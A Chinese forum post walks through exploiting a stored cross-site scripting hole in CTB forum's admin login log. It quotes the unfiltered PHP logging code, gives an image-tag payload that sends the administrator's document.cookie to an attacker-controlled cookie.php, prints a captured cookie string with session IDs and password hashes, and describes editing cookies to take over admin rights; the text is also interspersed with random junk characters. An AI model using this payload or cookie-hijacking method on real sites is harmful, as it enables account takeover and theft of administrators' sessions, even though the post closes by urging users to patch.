- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0

我的地盘我做主
该用户从未签到
 |
|
在CTB论坛中对前台和后台登陆的情况都设置了一个日志记录供管理员查看,可以让管理员尽快发现论坛是否被人入侵。但是对于用户递交的数据没有进行任何处理就记录到了日志当中,我们可以通过递交特殊的语句来进行跨站攻击,从而直接得到密码。 & Y; B( ^5 [! S/ N4 \1 _* q% K2 H
+ m9 E. v& c% X 我们看看admin目录下的login.php文件的日志处理部分的代码:
. d( O' S2 \4 `6 G' G8 [
8 w& I G/ @1 |) a( y) U. b代码: $ @1 @$ d% x' W
-------------------------------------------------------------------------------- : s4 a" K% r. @4 r' |
& ?. h! P9 P8 M* \8 R3 m5 r& J//后台管理员登陆日志
( @! f0 ~* |4 Cfunction adminLoginLog($check="ok")
0 l& E' H' u( \( d& Q+ ?6 ^{
9 m. G. i: Q0 f' G$ [3 n- L0 a if($this->set[logRecord] == "N"){
1 m: Y1 E3 h3 H$ l1 v- a/ m _* {) d) G return false; : [5 U& q* }- W8 E I7 c0 I+ q
}
4 {/ Q# T" N$ i) Q; B! q $msgArray[phpCode] = $this->code;
1 K3 `7 H; i# f: R6 X" x //判断文件大小是否需要清空 2 _/ X. Q% i; k- ?! K; S
if (filesize("../".$this->set['dataPath']."/log_adminlogin.php") > $this->set['logRecordSize']){ / o9 w5 p {! r. D& d3 }- S* w
$this->file = "../".$this->set['dataPath']."/log_adminlogin.php"; 6 B+ v' ]6 W5 @7 Y, d
$this->null_write(""); 2 i, S: p d6 o) T0 K# a
} , q1 f+ H6 f- Q! _; D
//登陆错误
3 h! Q X4 Q; G0 X //省去部分代码........
( T, u1 M# h; M: H4 S //登陆失败 1 }% p7 p3 C. w8 I9 S v
else {
`; O/ a3 N. q% d, G& `- n $msgArray[loginMode] = 0; / w7 u- k$ C; a. ]3 p# p
$msgArray[loginId] = $this->input['userName']; ( F6 Z$ O* `; W6 ?
$msgArray[wrongMsg] = $check; # t0 i! T B' C7 [( n G
$msgArray[userIp] = $this->ip;
, b) C' Q+ ^0 E1 }, {: g $msgArray[loginTime] = time();
! b% K+ m7 v: `" V* m- d $msgArray[temp1] = ""; //备用
* Z6 G7 }0 n# P |& i2 l $msgArray[temp2] = ""; //备用
( Z4 U" z' G# z9 Z- c* T4 d $this->file = "../".$this->set['dataPath']."/log_adminlogin.php";
5 ~ Q4 F7 Q, q, T1 g $this->add_line($msgArray); / ~7 m# G- E F) g {2 P2 r( K& v1 r
}
* G3 G2 K; Z3 \( M5 p% V/ m# x4 R}
: z# \% t% ?' e+ H" d2 a
+ \% u, X6 f/ U: |--------------------------------------------------------------------------------
% q1 p/ u$ k7 `% g7 b% D( J8 y( f5 t) B0 A; O
从代码上看我们递交的用户名等信息既不会进行任何过滤也无论正确与否都会被保存到log_adminlogin.php里去,当管理员登陆到后台查看日志的时候就会显示出log_adminlogin.php里面记录的登陆信息,我们也就可以通过这个方法来得到管理员的ID和密码等信息。 + @* d8 h! H) I
' |, D' \$ d) k5 }$ z% C
我们打开后台登陆页面,在用户名那里输入:
1 a4 p H% @9 c6 p2 U; ~ J
( ?3 i/ O0 {. r& c X1 P; w代码:
0 D6 W/ n; Q' G, ~6 \9 f9 _-------------------------------------------------------------------------------- ' j/ [4 s9 Q; I5 k- r
7 }/ M5 O4 b& W' p<img src="javascript:window.open('http://192.168.1.1/cookie.php?'+document.cookie)">
" h3 C9 h/ N' o2 h/ i2 p/ }+ W3 e* @, `' o" B
--------------------------------------------------------------------------------
k& L. m- B5 C- o q$ a- O" y$ r1 N7 m
因为无论登陆成功否,程序都会进行记录,所以密码我们可以随便填。其中192.168.1.1为我们放置cookie.php的网址,cookie.php为一个可以获得cookie信息的PHP文件。现在我们要做的就是等了,只要管理员一查看后台登陆日志,我们的PHP程序就会把他的COOKIE截取下来。 1 _% m- }. E* j2 N8 ]6 |1 A3 Q
& b- {4 G$ W! h( k/ N 让我们看看截取到的文件内容: ; k; X/ ]7 h; ?$ s# k2 ?) c
- {3 k$ B! W3 T7 p7 i* Y
引用: 3 t! F) s! N$ I1 J; @
-------------------------------------------------------------------------------- , R7 L! I9 @, f
9 `8 @- r' w7 z4 ~- j6 F' ?
ctb_user_login=ctb;%20ctb_user_pass=ce445102682e75bf533d44e1afc38a90;%20ctb_login_mode=1;%20eremite=0;%20skins=2;%20fylinklinkfylogin=cpb;%20userpass=2BA2A8AC968A7A2B0A7BAA7F2FEF18D2;%20username=sniper;%20Dwebdv=userid=1&usercookies=2&userhidden=&password=0reu3g775VrY7458&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=3980383;%20TZ=480;%20PHPSESSID=d8765179dc4f3a8708515a031216e503
2 x9 a2 G) s/ L, A D' K
1 F4 ~+ d2 e+ \1 z o( k+ F; h--------------------------------------------------------------------------------
n( J. e! y: |# g
& |* l( O* X) l7 `# o 我们需要只有ctb_user_login、ctb_user_pass和ctb_login_mode三个就可以得到前台管理权限了,有了这些信息,我们要获得前台管理员权限就非常容易,用IECookieView找到我们要编辑的COOKIE,把相应的部分替换掉,保存后再进入该站点你就是前台管理员了。
6 C a O+ |: D0 a
- |& s& X$ X/ ^. W8 L- E 很简单的我们就得到了论坛的管理权限,如果被人利用,那么相信后果是非常严重的,希望用CTB论坛的朋友关注他们的官方站点的补丁发布情况,尽快修补该漏洞,以免造成不必要的损失。 " x7 c& Y6 }2 h- a' g7 a6 p6 g
|
zan
|